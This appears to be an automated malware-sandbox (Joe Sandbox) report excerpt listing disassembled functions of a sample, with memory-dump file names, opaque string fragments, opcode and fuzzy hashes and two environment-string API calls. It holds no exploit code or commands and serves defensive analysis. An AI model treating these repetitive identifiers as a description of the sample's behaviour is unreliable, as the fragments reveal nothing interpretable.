                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE@$Xs$bF@$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                                • API String ID: 237503144-2395656424
                                                                                                                                                                                                                                                                • Opcode ID: 50f24ebb28f5440a40d9d41e0f63b2f26d563196d075d476a9e8df94b74976a1
                                                                                                                                                                                                                                                                • Instruction ID: c966f4ac8f427b21cc70baf88be12c6d964f665952b6ed88dba65ffd14d98ff6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50f24ebb28f5440a40d9d41e0f63b2f26d563196d075d476a9e8df94b74976a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C21CB560D3848AD334CF14D452B9FBBF2FB82300F00892DD5E96B255D7B5864A8B9B
                                                                                                                                                                                                                                                                Function 00404560 Relevance: 39.6, APIs: 1, Strings: 21, Instructions: 1081COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE@$Xs$bF@$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                                • API String ID: 0-331053651
                                                                                                                                                                                                                                                                • Opcode ID: 6ef19ac2d80e48a90fff625b1a33ab107428725706407653a6da9defb3075a89
                                                                                                                                                                                                                                                                • Instruction ID: e1c64604b33326bc4d9a732705f32018b3092db26ee44f6aca2e79f99823800f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef19ac2d80e48a90fff625b1a33ab107428725706407653a6da9defb3075a89
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C20DB560D3848AE334CF54C442BDFBAF2FB82304F00892DD5E96B255D7B5464A8B9B
                                                                                                                                                                                                                                                                Function 003F60E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                                                                                                                • Opcode ID: 192f4247362966952d2b210b3de79650a8c7503379f0fe9f981055f4b2dad4d2
                                                                                                                                                                                                                                                                • Instruction ID: bd9de707c4de603cf13fbe7795a2b408e500853a39148aaec991456afe2e02fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192f4247362966952d2b210b3de79650a8c7503379f0fe9f981055f4b2dad4d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C14225726083558FC7358F28D8927ABB7E2FBD5314F1A893CD5D98B256D7348806CB82
                                                                                                                                                                                                                                                                Function 003F747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                                • API String ID: 0-3116432788
                                                                                                                                                                                                                                                                • Opcode ID: fdb731dce458282b25899f53a885c32a4f6576c3df97543239f0d9f1c5c68d1a
                                                                                                                                                                                                                                                                • Instruction ID: 8e52a54be5aae6dc4f2aa87f9c8f81982f39ce939fa86df3e1abcf4da3734829
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdb731dce458282b25899f53a885c32a4f6576c3df97543239f0d9f1c5c68d1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A98236716083518BC725CF28C8917BBB7E2FFC9314F198A6DE9D59B2A5E7348806C742
                                                                                                                                                                                                                                                                Function 003E9310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                                                                                                                                                                                                                                • API String ID: 0-3116088196
                                                                                                                                                                                                                                                                • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                                • Instruction ID: 61d6191d295f1d389c4818539fb4cd74b802cc860fe825ecc8b66283111068ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5C126B160C3D58BD322CF6A94A035BFFD19FD7210F094AADE4D51B386D275890ACB92
                                                                                                                                                                                                                                                                Function 0059E0D0 Relevance: 7.8, Strings: 5, Instructions: 1574COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: vv$/+b$6A$_Po^$|}?
                                                                                                                                                                                                                                                                • API String ID: 0-1440487632
                                                                                                                                                                                                                                                                • Opcode ID: cc0c77a8679daede51d710f9df775b983b0a14aa419135f898a09819cf59e05a
                                                                                                                                                                                                                                                                • Instruction ID: cc62bf496ab48f45acb6289ea8b9d5eabfa76372a319c34821755fae5c027efe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc0c77a8679daede51d710f9df775b983b0a14aa419135f898a09819cf59e05a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33B2F4F3A0C2049FD304AF29EC8563AFBE9EF94720F16893DE6C587744EA3558448697
                                                                                                                                                                                                                                                                Function 004081CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004084BD
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004085B4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                                • Opcode ID: 996039f15eceed9c429293725d3ca5cbcd0b7da26ab01bfa7e2660e6506d5003
                                                                                                                                                                                                                                                                • Instruction ID: 6d14fba03144a2aa18385f5b1a5c2d2495b2f551cd60598e62a4535f32014722
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996039f15eceed9c429293725d3ca5cbcd0b7da26ab01bfa7e2660e6506d5003
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA220071A08381CFD3248F28D88172FBBE1BF85320F194A7DE995573A1D7359912CB9A
                                                                                                                                                                                                                                                                Function 004083D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004084BD
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004085B4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                                • Opcode ID: 710523a206aeac1454465f3554c1dfff8e2600b9fb6403177839a509b445338b
                                                                                                                                                                                                                                                                • Instruction ID: 3d51d657d49a94c1703a572ce1d6e72d610f40dc27635ad8bdd7e55f6f3a1d5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 710523a206aeac1454465f3554c1dfff8e2600b9fb6403177839a509b445338b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E12F171A08381CFD7248F28D88171BBBE1BF85310F194A7DE9D96B3A1D7359902CB96
                                                                                                                                                                                                                                                                Function 004024E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                                • API String ID: 0-1171452581
                                                                                                                                                                                                                                                                • Opcode ID: 911c2eded715812e8f90166cfb47f05dcd1507888977cf4892151d023dbb2201
                                                                                                                                                                                                                                                                • Instruction ID: ae98e4f4e26227a805bd0bc513abf8a3f790f5e9c9758ab25f31fcea83a25335
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 911c2eded715812e8f90166cfb47f05dcd1507888977cf4892151d023dbb2201
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B89113B16083009BC720DF24C895B67B7B5EF85318F14892DF9899B3C1E3B9D906C75A
                                                                                                                                                                                                                                                                Function 003F8169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
